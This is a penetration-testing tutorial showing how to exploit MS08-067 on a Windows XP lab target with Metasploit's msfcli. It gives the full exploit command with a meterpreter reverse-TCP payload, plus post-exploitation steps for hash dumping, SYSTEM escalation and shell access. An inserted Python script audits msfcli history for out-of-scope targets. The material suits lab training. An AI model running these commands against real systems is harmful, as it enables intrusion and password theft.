exploit using metasploit msfcli

How to exploit using msfcli?

Metasploit exploit using msfcli command line interface.

Warning: don’t try this on any public, corporate or unauthorized networks. Perform it only when you have authorization to do so.

Exploit attempts using the Metasploit Framework can be made through different approaches, such as msfcli, msfconsole, shell scripting and resource scripting.

Help for msfcli command line usage

#msfcli -h

In this guide we are going to use Windows XP as our target (victim).

Lab – Setup

Target(victim) :
OS in target : Windows XP
Exploit : ms08-067
Port : 445

Attacker :
OS in attacker : Kali Linux
Exploit framework : Metasploit
Exploit method : msfcli

msfcli usage :

Exploit module:
#msfcli exploitname payload=windows/meterpreter/reverse_tcp lhost=IP E

Scanner module:
#msfcli auxiliary/scanner/http/http_version rhosts=IP E

Note: the option “E” executes the module.
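For anyone reviewing a lab or engagement host afterwards, the syntax above (module path, OPTION=value pairs, trailing mode letter) is regular enough to audit from shell history. The following is an added example, not part of the original post: it parses msfcli command lines and reports which executed runs pointed at targets outside an authorized list. The function names, the option list (limited to the options named on this page) and the sample history with documentation-range addresses are all constructed for illustration.

```python
import shlex

KNOWN_OPTIONS = {"PAYLOAD", "LHOST", "LPORT", "RHOST", "RHOSTS"}  # options named on this page

def parse_msfcli(cmdline):
    """Parse 'msfcli <module> KEY=value ... <mode>'; return None for other commands."""
    try:
        tokens = shlex.split(cmdline.strip().lstrip("#").strip())
    except ValueError:  # unbalanced quotes in a history line
        return None
    if len(tokens) < 2 or tokens[0].rsplit("/", 1)[-1] != "msfcli":
        return None
    module = None if tokens[1].startswith("-") else tokens[1]  # e.g. "msfcli -h"
    rec = {"module": module, "options": {}, "unknown": [], "mode": None}
    for tok in tokens[2:]:
        if "=" in tok:
            key, value = tok.split("=", 1)
            key = key.upper()  # the page writes both lhost= and LHOST=
            rec["options"][key] = value
            if key not in KNOWN_OPTIONS:
                rec["unknown"].append(key)  # mistyped or unexpected option name
        elif len(tok) == 1 and tok.isalpha():
            rec["mode"] = tok.upper()  # "E" executes the module
    return rec

def audit(history, authorized_targets):
    """Return one finding per msfcli run that was actually executed (mode E)."""
    findings = []
    for line in history:
        rec = parse_msfcli(line)
        if rec is None or rec["mode"] != "E":
            continue
        target = rec["options"].get("RHOST") or rec["options"].get("RHOSTS")
        findings.append({"module": rec["module"], "target": target,
                         "in_scope": target in authorized_targets,
                         "unknown_options": rec["unknown"]})
    return findings

# Constructed sample history; addresses come from the documentation ranges.
SAMPLE_HISTORY = [
    "ls -la",
    "#msfcli -h",
    "msfcli auxiliary/scanner/http/http_version rhosts=192.0.2.10 E",
    "msfcli exploit/windows/smb/ms08_067_netapi PYALOAD=windows/meterpreter/reverse_tcp "
    "LHOST=192.0.2.5 LPORT=4444 RHOST=198.51.100.7 E",
]

if __name__ == "__main__":
    print(audit(SAMPLE_HISTORY, {"192.0.2.10"}))
```

With the sample history, the scanner run is reported as in scope, while the exploit run is flagged both for an out-of-scope target and for the unrecognised option name.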

The location of modules in Kali Linux

Let’s make an exploit attempt on the target PC.

Step 1:

#msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=4444 RHOST= E

LHOST = local host IP (attacker)
LPORT = 4444, the listening port that receives the reverse shell on the attacker PC
RHOST = target IP address (victim)

E = Execute

Step 2:

Once the meterpreter session is established, proceed to post-exploitation.

The help command shows the usage of the commands available during post-exploitation, information gathering or privilege escalation.

meterpreter > help

Get the password hashes from the SAM database
meterpreter > hashdump

Privilege escalation to the SYSTEM account
meterpreter > getsystem

Get a shell on the target PC
meterpreter > shell
